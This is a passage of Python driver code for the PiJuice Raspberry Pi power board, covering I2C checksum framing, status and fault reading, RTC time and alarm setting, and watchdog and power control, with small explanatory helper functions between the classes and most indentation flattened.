self.t = threading.Thread(target=oper, args=())
self.t.start()
# wait for transfer to finish or timeout
n = 0
while self.t.is_alive() and n < 2:
time.sleep(0.05)
n = n + 1
if self.comError or self.t.is_alive():
return False
return True
def ReadData(self, cmd, length):
d = []
self.cmd = cmd
self.length = length + 1
if not self._DoTransfer(self._Read):
return {'error': 'COMMUNICATION_ERROR'}
d = self.d
if self._GetChecksum(d[0:-1]) != d[-1]:
# With n+1 byte data (n data bytes and 1 checksum byte) sometimes the
# MSbit of the first received data byte is 0 while it should be 1. So we
# repeat the checksum test with the MSbit of the first data byte set to 1.
d[0] |= 0x80
if self._GetChecksum(d[0:-1]) == d[-1]:
del d[-1]
return {'data': d, 'error': 'NO_ERROR'}
return {'error': 'DATA_CORRUPTED'}
del d[-1]
return {'data': d, 'error': 'NO_ERROR'}
def WriteData(self, cmd, data):
fcs = self._GetChecksum(data)
d = data[:]
d.append(fcs)
self.cmd = cmd
self.d = d
if not self._DoTransfer(self._Write):
return {'error': 'COMMUNICATION_ERROR'}
return {'error': 'NO_ERROR'}
def WriteDataVerify(self, cmd, data, delay=None):
wresult = self.WriteData(cmd, data)
if wresult['error'] != 'NO_ERROR':
return wresult
else:
            if delay is not None:
                try:
                    time.sleep(float(delay))
                except (TypeError, ValueError):
                    time.sleep(0.1)
result = self.ReadData(cmd, len(data))
if result['error'] != 'NO_ERROR':
return result
else:
if (data == result['data']):
return {'error': 'NO_ERROR'}
else:
return {'error': 'WRITE_FAILED'}
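# Illustrative sketch: ReadData/WriteData above frame every transfer as
# <payload bytes> + <XOR checksum seeded with 0xFF>, and ReadData retries the
# check with the MSbit of the first byte forced high to work around a known
# transfer quirk. The hypothetical helpers below only demonstrate the framing;
# they talk to no hardware.
def demo_checksum_frame(payload):
    # Append the XOR checksum used by the PiJuice protocol.
    fcs = 0xFF
    for byte in payload:
        fcs ^= byte
    return payload + [fcs]
def demo_checksum_ok(frame):
    # Recompute the checksum over the payload and compare with the last byte.
    fcs = 0xFF
    for byte in frame[:-1]:
        fcs ^= byte
    return fcs == frame[-1]
# demo_checksum_ok(demo_checksum_frame([0x12, 0x34])) -> True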
class PiJuiceStatus(object):
STATUS_CMD = 0x40
FAULT_EVENT_CMD = 0x44
CHARGE_LEVEL_CMD = 0x41
BUTTON_EVENT_CMD = 0x45
BATTERY_TEMPERATURE_CMD = 0x47
BATTERY_VOLTAGE_CMD = 0x49
BATTERY_CURRENT_CMD = 0x4b
IO_VOLTAGE_CMD = 0x4d
IO_CURRENT_CMD = 0x4f
LED_STATE_CMD = 0x66
LED_BLINK_CMD = 0x68
IO_PIN_ACCESS_CMD = 0x75
def __init__(self, interface):
self.interface = interface
def __enter__(self):
# Just return this object so it can be used in a with statement
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False # Don't suppress exceptions.
def GetStatus(self):
result = self.interface.ReadData(self.STATUS_CMD, 1)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data'][0]
status = {}
status['isFault'] = bool(d & 0x01)
status['isButton'] = bool(d & 0x02)
batStatusEnum = ['NORMAL', 'CHARGING_FROM_IN',
'CHARGING_FROM_5V_IO', 'NOT_PRESENT']
status['battery'] = batStatusEnum[(d >> 2) & 0x03]
powerInStatusEnum = ['NOT_PRESENT', 'BAD', 'WEAK', 'PRESENT']
status['powerInput'] = powerInStatusEnum[(d >> 4) & 0x03]
status['powerInput5vIo'] = powerInStatusEnum[(d >> 6) & 0x03]
return {'data': status, 'error': 'NO_ERROR'}
def GetChargeLevel(self):
result = self.interface.ReadData(self.CHARGE_LEVEL_CMD, 1)
if result['error'] != 'NO_ERROR':
return result
else:
return {'data': result['data'][0], 'error': 'NO_ERROR'}
faultEvents = ['button_power_off', 'forced_power_off',
'forced_sys_power_off', 'watchdog_reset']
faults = ['battery_profile_invalid', 'charging_temperature_fault']
def GetFaultStatus(self):
result = self.interface.ReadData(self.FAULT_EVENT_CMD, 1)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data'][0]
fault = {}
if d & 0x01:
fault['button_power_off'] = True
if d & 0x02:
fault['forced_power_off'] = True # bool(d & 0x02)
if d & 0x04:
fault['forced_sys_power_off'] = True
if d & 0x08:
fault['watchdog_reset'] = True
if d & 0x20:
fault['battery_profile_invalid'] = True
batChargingTempEnum = ['NORMAL', 'SUSPEND', 'COOL', 'WARM']
if (d >> 6) & 0x03:
fault['charging_temperature_fault'] = batChargingTempEnum[(d >> 6) & 0x03]
return {'data': fault, 'error': 'NO_ERROR'}
def ResetFaultFlags(self, flags):
d = 0xFF
for ev in flags:
try:
d = d & ~(0x01 << self.faultEvents.index(ev))
            except ValueError:
                pass  # ignore unknown fault event names
self.interface.WriteData(self.FAULT_EVENT_CMD, [d]) # clear fault events
buttonEvents = ['NO_EVENT', 'PRESS', 'RELEASE',
'SINGLE_PRESS', 'DOUBLE_PRESS', 'LONG_PRESS1', 'LONG_PRESS2']
def GetButtonEvents(self):
result = self.interface.ReadData(self.BUTTON_EVENT_CMD, 2)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
event = {}
try:
event['SW1'] = self.buttonEvents[d[0] & 0x0F]
except:
event['SW1'] = 'UNKNOWN'
try:
event['SW2'] = self.buttonEvents[(d[0] >> 4) & 0x0F]
except:
event['SW2'] = 'UNKNOWN'
try:
event['SW3'] = self.buttonEvents[d[1] & 0x0F]
except:
event['SW3'] = 'UNKNOWN'
#event['SW4'] = self.buttonEvents[(d[1] >> 4) & 0x0F]
return {'data': event, 'error': 'NO_ERROR'}
buttons = ['SW' + str(i+1) for i in range(0, 3)]
def AcceptButtonEvent(self, button):
b = None
try:
b = self.buttons.index(button)
except ValueError:
return {'error': 'BAD_ARGUMENT'}
d = [0xF0, 0xFF] if b == 0 else [0x0F, 0xFF] if b == 1 else [0xFF, 0xF0]
self.interface.WriteData(self.BUTTON_EVENT_CMD, d) # clear button events
def GetBatteryTemperature(self):
result = self.interface.ReadData(self.BATTERY_TEMPERATURE_CMD, 2)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
temp = d[0]
if (d[0] & (1 << 7)):
temp = temp - (1 << 8)
return {'data': temp, 'error': 'NO_ERROR'}
def GetBatteryVoltage(self):
result = self.interface.ReadData(self.BATTERY_VOLTAGE_CMD, 2)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
return {'data': (d[1] << 8) | d[0], 'error': 'NO_ERROR'}
def GetBatteryCurrent(self):
result = self.interface.ReadData(self.BATTERY_CURRENT_CMD, 2)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
i = (d[1] << 8) | d[0]
if (i & (1 << 15)):
i = i - (1 << 16)
return {'data': i, 'error': 'NO_ERROR'}
def GetIoVoltage(self):
result = self.interface.ReadData(self.IO_VOLTAGE_CMD, 2)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
return {'data': (d[1] << 8) | d[0], 'error': 'NO_ERROR'}
def GetIoCurrent(self):
result = self.interface.ReadData(self.IO_CURRENT_CMD, 2)
if result['error'] != 'NO_ERROR':
return result
else:
d = result['data']
i = (d[1] << 8) | d[0]
if (i & (1 << 15)):
i = i - (1 << 16)
return {'data': i, 'error': 'NO_ERROR'}
leds = ['D1', 'D2']
def SetLedState(self, led, rgb):
i = None
try:
i = self.leds.index(led)
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteData(self.LED_STATE_CMD + i, rgb)
def GetLedState(self, led):
i = None
try:
i = self.leds.index(led)
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.ReadData(self.LED_STATE_CMD + i, 3)
def SetLedBlink(self, led, count, rgb1, period1, rgb2, period2):
i = None
d = None
try:
i = self.leds.index(led)
d = [count & 0xFF] + rgb1*1 + \
[(period1//10) & 0xFF] + rgb2*1 + [(period2//10) & 0xFF]
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteData(self.LED_BLINK_CMD + i, d)
def GetLedBlink(self, led):
i = None
try:
i = self.leds.index(led)
except:
return {'error': 'BAD_ARGUMENT'}
ret = self.interface.ReadData(self.LED_BLINK_CMD + i, 9)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data']
return {
'data': {
'count': d[0],
'rgb1': d[1:4],
'period1': d[4] * 10,
'rgb2': d[5:8],
'period2': d[8] * 10
},
'error': 'NO_ERROR'
}
def GetIoDigitalInput(self, pin):
if not (pin == 1 or pin == 2):
return {'error': 'BAD_ARGUMENT'}
ret = self.interface.ReadData(self.IO_PIN_ACCESS_CMD + (pin-1)*5, 2)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data']
b = 1 if d[0] == 0x01 else 0
return {'data': b, 'error': 'NO_ERROR'}
def SetIoDigitalOutput(self, pin, value):
if not (pin == 1 or pin == 2):
return {'error': 'BAD_ARGUMENT'}
d = [0x00, 0x00]
d[1] = 0x00 if value == 0 else 0x01
return self.interface.WriteData(self.IO_PIN_ACCESS_CMD + (pin-1)*5, d)
def GetIoDigitalOutput(self, pin):
if not (pin == 1 or pin == 2):
return {'error': 'BAD_ARGUMENT'}
ret = self.interface.ReadData(self.IO_PIN_ACCESS_CMD + (pin-1)*5, 2)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data']
b = 1 if d[1] == 0x01 else 0
return {'data': b, 'error': 'NO_ERROR'}
def GetIoAnalogInput(self, pin):
if not (pin == 1 or pin == 2):
return {'error': 'BAD_ARGUMENT'}
ret = self.interface.ReadData(self.IO_PIN_ACCESS_CMD + (pin-1)*5, 2)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data']
return {'data': (d[1] << 8) | d[0], 'error': 'NO_ERROR'}
def SetIoPWM(self, pin, dutyCycle):
if not (pin == 1 or pin == 2):
return {'error': 'BAD_ARGUMENT'}
d = [0xFF, 0xFF]
try:
dc = float(dutyCycle)
except:
return {'error': 'BAD_ARGUMENT'}
if dc < 0 or dc > 100:
return {'error': 'INVALID_DUTY_CYCLE'}
elif dc < 100:
dci = int(round(dc * 65534 // 100))
d[0] = dci & 0xFF
d[1] = (dci >> 8) & 0xFF
return self.interface.WriteData(self.IO_PIN_ACCESS_CMD + (pin-1)*5, d)
def GetIoPWM(self, pin):
if not (pin == 1 or pin == 2):
return {'error': 'BAD_ARGUMENT'}
ret = self.interface.ReadData(self.IO_PIN_ACCESS_CMD + (pin-1)*5, 2)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data']
dci = d[0] | (d[1] << 8)
dc = float(dci) * 100 // 65534 if dci < 65535 else 100
return {'data': dc, 'error': 'NO_ERROR'}
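# Illustrative sketch: GetStatus above unpacks a single status byte into bit
# fields (bit 0 fault, bit 1 button, bits 2-3 battery state, bits 4-5 power
# input, bits 6-7 5V GPIO input). A standalone decoder mirroring that layout
# (hypothetical helper, not used by the driver):
def demo_decode_status_byte(d):
    battery = ['NORMAL', 'CHARGING_FROM_IN', 'CHARGING_FROM_5V_IO', 'NOT_PRESENT']
    power = ['NOT_PRESENT', 'BAD', 'WEAK', 'PRESENT']
    return {
        'isFault': bool(d & 0x01),
        'isButton': bool(d & 0x02),
        'battery': battery[(d >> 2) & 0x03],
        'powerInput': power[(d >> 4) & 0x03],
        'powerInput5vIo': power[(d >> 6) & 0x03],
    }
# demo_decode_status_byte(0x00) -> no fault, battery NORMAL, both inputs NOT_PRESENT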
class PiJuiceRtcAlarm(object):
RTC_ALARM_CMD = 0xB9
RTC_TIME_CMD = 0xB0
RTC_CTRL_STATUS_CMD = 0xC2
def __init__(self, interface):
self.interface = interface
def __enter__(self):
# Just return this object so it can be used in a with statement
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False # Don't suppress exceptions.
def GetControlStatus(self):
ret = self.interface.ReadData(self.RTC_CTRL_STATUS_CMD, 2)
if ret['error'] != 'NO_ERROR':
return ret
d = ret['data']
r = {}
if (d[0] & 0x01) and (d[0] & 0x04):
r['alarm_wakeup_enabled'] = True
else:
r['alarm_wakeup_enabled'] = False
if d[1] & 0x01:
r['alarm_flag'] = True
else:
r['alarm_flag'] = False
return {'data': r, 'error': 'NO_ERROR'}
def ClearAlarmFlag(self):
ret = self.interface.ReadData(self.RTC_CTRL_STATUS_CMD, 2)
if ret['error'] != 'NO_ERROR':
return ret
d = ret['data']
if d[1] & 0x01:
d[1] = d[1] & 0xFE
return self.interface.WriteDataVerify(self.RTC_CTRL_STATUS_CMD, d)
else:
return {'error': 'NO_ERROR'}
def SetWakeupEnabled(self, status):
ret = self.interface.ReadData(self.RTC_CTRL_STATUS_CMD, 2)
if ret['error'] != 'NO_ERROR':
return ret
d = ret['data']
if (d[0] & 0x01) and (d[0] & 0x04):
if status == True:
return {'error': 'NO_ERROR'}
else:
d[0] = d[0] & 0xFE
else:
if status == False:
return {'error': 'NO_ERROR'}
else:
d[0] = d[0] | 0x01 | 0x04
return self.interface.WriteDataVerify(self.RTC_CTRL_STATUS_CMD, d)
def GetTime(self):
ret = self.interface.ReadData(self.RTC_TIME_CMD, 9)
if ret['error'] != 'NO_ERROR':
return ret
d = ret['data']
dt = {}
dt['second'] = ((d[0] >> 4) & 0x07) * 10 + (d[0] & 0x0F)
dt['minute'] = ((d[1] >> 4) & 0x07) * 10 + (d[1] & 0x0F)
if (d[2] & 0x40):
# hourFormat = '12'
ampm = 'PM' if (d[2] & 0x20) else 'AM'
dt['hour'] = str(((d[2] >> 4) & 0x01) * 10 + (d[2] & 0x0F)) + ' ' + ampm
else:
# hourFormat = '24'
dt['hour'] = ((d[2] >> 4) & 0x03) * 10 + (d[2] & 0x0F)
dt['weekday'] = d[3] & 0x07
dt['day'] = ((d[4] >> 4) & 0x03) * 10 + (d[4] & 0x0F)
dt['month'] = ((d[5] >> 4) & 0x01) * 10 + (d[5] & 0x0F)
dt['year'] = ((d[6] >> 4) & 0x0F) * 10 + (d[6] & 0x0F) + 2000
dt['subsecond'] = d[7] // 256
if (d[8] & 0x03) == 2:
dt['daylightsaving'] = 'SUB1H'
elif (d[8] & 0x03) == 1:
dt['daylightsaving'] = 'ADD1H'
else:
dt['daylightsaving'] = 'NONE'
if d[8] & 0x04:
dt['storeoperation'] = True
else:
dt['storeoperation'] = False
return {'data': dt, 'error': 'NO_ERROR'}
def SetTime(self, dateTime):
d = [0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]
if dateTime == None or dateTime == {}:
dt = {}
else:
dt = dateTime
if 'second' in dt:
try:
s = int(dt['second'])
except:
return {'error': 'INVALID_SECOND'}
if s < 0 or s > 60:
return {'error': 'INVALID_SECOND'}
d[0] = ((s // 10) & 0x0F) << 4
d[0] = d[0] | ((s % 10) & 0x0F)
if 'minute' in dt:
try:
m = int(dt['minute'])
except:
return {'error': 'INVALID_MINUTE'}
if m < 0 or m > 60:
return {'error': 'INVALID_MINUTE'}
d[1] = ((m // 10) & 0x0F) << 4
d[1] = d[1] | ((m % 10) & 0x0F)
if 'hour' in dt:
try:
h = dt['hour']
if isinstance(h, str):
if (h.find('AM') > -1) or (h.find('PM') > -1):
if (h.find('PM') > -1):
hi = int(h.split('PM')[0])
if hi < 1 or hi > 12:
return {'error': 'INVALID_HOUR'}
d[2] = (((hi // 10) & 0x03) << 4)
d[2] = d[2] | ((hi % 10) & 0x0F)
d[2] = d[2] | 0x20 | 0x40
else:
hi = int(h.split('AM')[0])
if hi < 1 or hi > 12:
return {'error': 'INVALID_HOUR'}
d[2] = (((hi // 10) & 0x03) << 4)
d[2] = d[2] | ((hi % 10) & 0x0F)
d[2] = d[2] | 0x40
else:
h = int(h)
if h < 0 or h > 23:
return {'error': 'INVALID_HOUR'}
d[2] = (((h // 10) & 0x03) << 4)
d[2] = d[2] | ((h % 10) & 0x0F)
elif isinstance(h, int):
#assume 24 hour format
if h < 0 or h > 23:
return {'error': 'INVALID_HOUR'}
d[2] = (((int(h) // 10) & 0x03) << 4)
d[2] = d[2] | ((int(h) % 10) & 0x0F)
except:
return {'error': 'INVALID_HOUR'}
if 'weekday' in dt:
try:
day = int(dt['weekday'])
except:
return {'error': 'INVALID_WEEKDAY'}
if day < 1 or day > 7:
return {'error': 'INVALID_WEEKDAY'}
d[3] = day & 0x07
if 'day' in dt:
try:
da = int(dt['day'])
except:
return {'error': 'INVALID_DAY'}
if da < 1 or da > 31:
return {'error': 'INVALID_DAY'}
d[4] = ((da // 10) & 0x03) << 4
d[4] = d[4] | ((da % 10) & 0x0F)
if 'month' in dt:
try:
m = int(dt['month'])
except:
return {'error': 'INVALID_MONTH'}
if m < 1 or m > 12:
return {'error': 'INVALID_MONTH'}
d[5] = ((m // 10) & 0x01) << 4
d[5] = d[5] | ((m % 10) & 0x0F)
if 'year' in dt:
try:
y = int(dt['year']) - 2000
except:
return {'error': 'INVALID_YEAR'}
if y < 0 or y > 99:
return {'error': 'INVALID_YEAR'}
d[6] = ((y // 10) & 0x0F) << 4
d[6] = d[6] | ((y % 10) & 0x0F)
if 'subsecond' in dt:
try:
s = int(dt['subsecond']) * 256
except:
return {'error': 'INVALID_SUBSECOND'}
if s < 0 or s > 255:
return {'error': 'INVALID_SUBSECOND'}
d[7] = s
if 'daylightsaving' in dt:
if dt['daylightsaving'] == 'SUB1H':
d[8] |= 2
elif dt['daylightsaving'] == 'ADD1H':
d[8] |= 1
if 'storeoperation' in dt and dt['storeoperation'] == True:
d[8] |= 0x04
ret = self.interface.WriteData(self.RTC_TIME_CMD, d)
if ret['error'] != 'NO_ERROR':
return ret
# verify
time.sleep(0.2)
ret = self.interface.ReadData(self.RTC_TIME_CMD, 9)
if ret['error'] != 'NO_ERROR':
return ret
if (d == ret['data']):
return {'error': 'NO_ERROR'}
else:
if abs(ret['data'][0] - d[0]) < 2:
ret['data'][0] = d[0]
ret['data'][7] = d[7]
if (d == ret['data']):
return {'error': 'NO_ERROR'}
else:
return {'error': 'WRITE_FAILED'}
else:
return {'error': 'WRITE_FAILED'}
def GetAlarm(self):
ret = self.interface.ReadData(self.RTC_ALARM_CMD, 9)
if ret['error'] != 'NO_ERROR':
return ret
d = ret['data']
alarm = {}
if (d[0] & 0x80) == 0x00:
alarm['second'] = ((d[0] >> 4) & 0x07) * 10 + (d[0] & 0x0F)
if (d[1] & 0x80) == 0x00:
alarm['minute'] = ((d[1] >> 4) & 0x07) * 10 + (d[1] & 0x0F)
else:
alarm['minute_period'] = d[7]
if (d[2] & 0x80) == 0x00:
if (d[2] & 0x40):
# hourFormat = '12'
ampm = 'PM' if (d[2] & 0x20) else 'AM'
alarm['hour'] = str(((d[2] >> 4) & 0x01) * 10 + (d[2] & 0x0F)) + ' ' + ampm
else:
# hourFormat = '24'
alarm['hour'] = ((d[2] >> 4) & 0x03) * 10 + (d[2] & 0x0F)
else:
if d[4] == 0xFF and d[5] == 0xFF and d[6] == 0xFF:
alarm['hour'] = 'EVERY_HOUR'
else:
h = ''
n = 0
for i in range(0, 3):
for j in range(0, 8):
if d[i+4] & ((0x01 << j) & 0xFF):
if (d[2] & 0x40):
if (i*8+j) == 0:
h12 = '12AM'
elif (i*8+j) == 12:
h12 = '12PM'
else:
h12 = (str(i*8+j+1)+'AM') if ((i*8+j) < 12) else (str(i*8+j-11)+'PM')
h = (h + ';') if n > 0 else h
h = h + h12
else:
h = (h + ';') if n > 0 else h
h = h + str(i*8+j)
n = n + 1
alarm['hour'] = h
if (d[3] & 0x40):
if (d[3] & 0x80) == 0x00:
alarm['weekday'] = d[3] & 0x07
else:
if d[8] == 0xFF:
alarm['weekday'] = 'EVERY_DAY'
else:
day = ''
n = 0
for j in range(1, 8):
if d[8] & ((0x01 << j) & 0xFF):
day = (day + ';') if n > 0 else day
day = day + str(j)
n = n + 1
alarm['weekday'] = day
else:
if (d[3] & 0x80) == 0x00:
alarm['day'] = ((d[3] >> 4) & 0x03) * 10 + (d[3] & 0x0F)
else:
alarm['day'] = 'EVERY_DAY'
return {'data': alarm, 'error': 'NO_ERROR'}
def SetAlarm(self, alarm):
d = [0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0xFF]
if alarm == None or alarm == {}:
#disable alarm
return self.interface.WriteDataVerify(self.RTC_ALARM_CMD, d, 0.2)
if 'second' in alarm:
try:
s = int(alarm['second'])
except:
return {'error': 'INVALID_SECOND'}
if s < 0 or s > 60:
return {'error': 'INVALID_SECOND'}
d[0] = ((s // 10) & 0x0F) << 4
d[0] = d[0] | ((s % 10) & 0x0F)
if 'minute' in alarm:
try:
m = int(alarm['minute'])
except:
return {'error': 'INVALID_MINUTE'}
if m < 0 or m > 60:
return {'error': 'INVALID_MINUTE'}
d[1] = ((m // 10) & 0x0F) << 4
d[1] = d[1] | ((m % 10) & 0x0F)
else:
d[1] = d[1] | 0x80 # every minute
#d[1] = d[1] | (0x80 if alarm['mask']['minutes'] else 0x00)
if 'minute_period' in alarm:
d[1] = d[1] | 0x80
try:
s = int(alarm['minute_period'])
except:
return {'error': 'INVALID_MINUTE_PERIOD'}
if s < 1 or s > 60:
return {'error': 'INVALID_MINUTE_PERIOD'}
d[7] = s
d[4] = 0xFF
d[5] = 0xFF
d[6] = 0xFF
if 'hour' in alarm:
try:
h = alarm['hour']
if h == 'EVERY_HOUR':
d[2] = 0x80
elif isinstance(h, str) and h.find(';') < 0:
if (h.find('AM') > -1) or (h.find('PM') > -1):
if (h.find('PM') > -1):
hi = int(h.split('PM')[0])
d[2] = (((hi // 10) & 0x03) << 4)
d[2] = d[2] | ((hi % 10) & 0x0F)
d[2] = d[2] | 0x20 | 0x40
else:
hi = int(h.split('AM')[0])
d[2] = (((hi // 10) & 0x03) << 4)
d[2] = d[2] | ((hi % 10) & 0x0F)
d[2] = d[2] | 0x40
else:
d[2] = (((int(h) // 10) & 0x03) << 4)
d[2] = d[2] | ((int(h) % 10) & 0x0F)
elif isinstance(h, int):
#assume 24 hour format
d[2] = (((int(h) // 10) & 0x03) << 4)
d[2] = d[2] | ((int(h) % 10) & 0x0F)
elif (isinstance(h, str) and h.find(';') >= 0):
hs = 0x00000000
# hFormat = ''
hl = h.split(';')
# remove ending empty string if there is ; at the end of list
hl = hl[0:-1] if (not bool(hl[-1].strip())) else hl
for i in hl:
if (i.find('AM') > -1) or (i.find('PM') > -1):
if i.find('AM') > -1:
ham = int(i.split('AM')[0])
if ham < 12:
hs = hs | (0x00000001 << (ham))
else:
hs = hs | 0x00000001
else:
hpm = int(i.split('PM')[0])
if hpm < 12:
hs = hs | (0x00000001 << (hpm+12))
else:
hs = hs | (0x00000001 << (12))
else:
hs = hs | (0x00000001 << int(i))
#d[2] = d[2] | (0x40 if hFormat == '12' else 0x00)
d[2] = 0x80
d[4] = hs & 0x000000FF
hs = hs >> 8
d[5] = hs & 0x000000FF
hs = hs >> 8
d[6] = hs & 0x000000FF
except:
return {'error': 'INVALID_HOUR'}
else:
d[2] = 0x80 # every hour
d[8] = 0xFF
if 'weekday' in alarm:
try:
day = alarm['weekday']
if day == 'EVERY_DAY':
d[3] = 0x80 | 0x40
elif isinstance(day, str) and day.find(';') < 0:
dw = int(day)
d[3] = d[3] | (dw & 0x0F) | 0x40
elif isinstance(day, int):
dw = int(day)
d[3] = d[3] | (dw & 0x0F) | 0x40
elif (isinstance(day, str) and day.find(';') >= 0):
d[3] = 0x40 | 0x80
ds = 0x00
dl = day.split(';')
dl = dl[0:-1] if (not bool(dl[-1].strip())) else dl
for i in dl:
ds = ds | (0x01 << int(i))
d[8] = ds
except:
return {'error': 'INVALID_WEEKDAY'}
elif 'day' in alarm:
try:
day = alarm['day']
if day == 'EVERY_DAY':
d[3] = 0x80
else:
dm = int(day)
d[3] = (((dm // 10) & 0x03) << 4)
d[3] = d[3] | ((dm % 10) & 0x0F)
except:
return {'error': 'INVALID_DAY_OF_MONTH'}
else:
d[3] = 0x80 # every day
ret = self.interface.WriteData(self.RTC_ALARM_CMD, d)
if ret['error'] != 'NO_ERROR':
return ret
# verify
time.sleep(0.2)
ret = self.interface.ReadData(self.RTC_ALARM_CMD, 9)
if ret['error'] != 'NO_ERROR':
return ret
if (d == ret['data']):
return {'error': 'NO_ERROR'}
else:
h1 = d[2]
h2 = ret['data'][2]
if (h1 & 0x40): # convert to 24 hour format
h1Bin = ((h1 >> 4) & 0x01) * 10 + (h1 & 0x0F)
h1Bin = h1Bin if h1Bin < 12 else 0
h1Bin = h1Bin + (12 if h1 & 0x20 else 0)
else:
h1Bin = ((h1 >> 4) & 0x03) * 10 + (h1 & 0x0F)
if (h2 & 0x40): # convert to 24 hour format
h2Bin = ((h2 >> 4) & 0x01) * 10 + (h2 & 0x0F)
h2Bin = h2Bin if h2Bin < 12 else 0
h2Bin = h2Bin + (12 if h2 & 0x20 else 0)
else:
h2Bin = ((h2 >> 4) & 0x03) * 10 + (h2 & 0x0F)
d[2] = h1Bin | (d[2] & 0x80)
ret['data'][2] = h2Bin | (ret['data'][2] & 0x80)
if (d == ret['data']):
return {'error': 'NO_ERROR'}
else:
return {'error': 'WRITE_FAILED'}
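# Illustrative sketch: the RTC time and alarm registers above store two-digit
# values in packed BCD (high nibble = tens, low nibble = units), which is why
# SetTime/SetAlarm build bytes as ((v // 10) << 4) | (v % 10). Hypothetical
# helpers showing the round trip (the driver masks the tens nibble with 0x07,
# 0x03 or 0x01 depending on the field):
def demo_to_bcd(value):
    return (((value // 10) & 0x0F) << 4) | ((value % 10) & 0x0F)
def demo_from_bcd(byte, tens_mask=0x0F):
    return ((byte >> 4) & tens_mask) * 10 + (byte & 0x0F)
# demo_to_bcd(59) -> 0x59; demo_from_bcd(0x59) -> 59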
class PiJuicePower(object):
WATCHDOG_ACTIVATION_CMD = 0x61
POWER_OFF_CMD = 0x62
WAKEUP_ON_CHARGE_CMD = 0x63
SYSTEM_POWER_SWITCH_CTRL_CMD = 0x64
def __init__(self, interface):
self.interface = interface
def __enter__(self):
# Just return this object so it can be used in a with statement
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False # Don't suppress exceptions.
def SetPowerOff(self, delay):
return self.interface.WriteData(self.POWER_OFF_CMD, [delay])
def GetPowerOff(self):
return self.interface.ReadData(self.POWER_OFF_CMD, 1)
def SetWakeUpOnCharge(self, arg, non_volatile = False):
try:
nv = 0x80 if non_volatile == True else 0x00
            if arg == 'DISABLED':
                d = nv | 0x7F
            elif int(arg) >= 0 and int(arg) <= 100:
                d = nv | int(arg)
            else:
                return {'error': 'BAD_ARGUMENT'}
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteData(self.WAKEUP_ON_CHARGE_CMD, [d])
def GetWakeUpOnCharge(self):
ret = self.interface.ReadData(self.WAKEUP_ON_CHARGE_CMD, 1)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data'][0]
if d&0x7F == 0x7F:
return {'data': 'DISABLED', 'non_volatile': bool(d & 0x80), 'error': 'NO_ERROR'}
else:
return {'data': d&0x7F, 'non_volatile': bool(d & 0x80), 'error': 'NO_ERROR'}
# input argument 1 - 65535 minutes activates watchdog, 0 disables watchdog
def SetWatchdog(self, minutes, non_volatile = False):
try:
nv = 0x8000 if non_volatile == True else 0x0000
d = int(minutes) & 0xFFFF
if d >= 0x4000: d = (d >> 2) | 0x4000 #correct resolution
d = d | nv
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteData(self.WATCHDOG_ACTIVATION_CMD, [d & 0xFF, (d >> 8) & 0xFF])
def GetWatchdog(self):
ret = self.interface.ReadData(self.WATCHDOG_ACTIVATION_CMD, 2)
if ret['error'] != 'NO_ERROR':
return ret
else:
d = ret['data']
cfg = (d[1] << 8) | d[0]
minutes = cfg & 0x3FFF
minutes = minutes << ((cfg&0x4000) >> 13) #correct resolution for range 16384-65536
return {'data': minutes, 'non_volatile': bool(cfg & 0x8000), 'error': 'NO_ERROR'}
def SetSystemPowerSwitch(self, state):
try:
d = int(state) // 100
except:
return {'error': 'BAD_ARGUMENT'}
return self.interface.WriteData(self.SYSTEM_POWER_SWITCH_CTRL_CMD, [d])
def GetSystemPowerSwitch(self):
ret = self.interface.ReadData(self.SYSTEM_POWER_SWITCH_CTRL_CMD, 1)
if ret['error'] != 'NO_ERROR':
return ret
else:
return {'data': ret['data'][0] * 100, 'error': 'NO_ERROR'}
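# Illustrative sketch: SetWatchdog/GetWatchdog above store minutes in 14 bits;
# values of 16384 minutes or more are divided by 4 and flagged with bit 14, so
# the range extends to roughly 65535 minutes at 4-minute resolution. A
# standalone round trip of that encoding (hypothetical helpers, non-volatile
# bit omitted):
def demo_encode_watchdog_minutes(minutes):
    d = int(minutes) & 0xFFFF
    if d >= 0x4000:
        d = (d >> 2) | 0x4000
    return d
def demo_decode_watchdog_minutes(cfg):
    minutes = cfg & 0x3FFF
    return minutes << ((cfg & 0x4000) >> 13)
# demo_decode_watchdog_minutes(demo_encode_watchdog_minutes(20000)) -> 20000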
class PiJuiceConfig(object):
CHARGING_CONFIG_CMD = 0x51
BATTERY_PROFILE_ID_CMD = 0x52
BATTERY_PROFILE_CMD = 0x53
BATTERY_EXT_PROFILE_CMD = 0x54
BATTERY_TEMP_SENSE_CONFIG_CMD = 0x5D
POWER_INPUTS_CONFIG_CMD = 0x5E
RUN_PIN_CONFIG_CMD = 0x5F
POWER_REGULATOR_CONFIG_CMD = 0x60
LED_CONFIGURATION_CMD = 0x6A
BUTTON_CONFIGURATION_CMD = 0x6E
IO_CONFIGURATION_CMD = 0x72
I2C_ADDRESS_CMD = 0x7C
ID_EEPROM_WRITE_PROTECT_CTRL_CMD = 0x7E
ID_EEPROM_ADDRESS_CMD = 0x7F
RESET_TO_DEFAULT_CMD = 0xF0
FIRMWARE_VERSION_CMD = 0xFD
def __init__(self, interface):
self.interface = interface
def __enter__(self):
# Just return this object so it can be used in a with statement
return self
def __exit__(self, exc_type, exc_val, exc_tb):
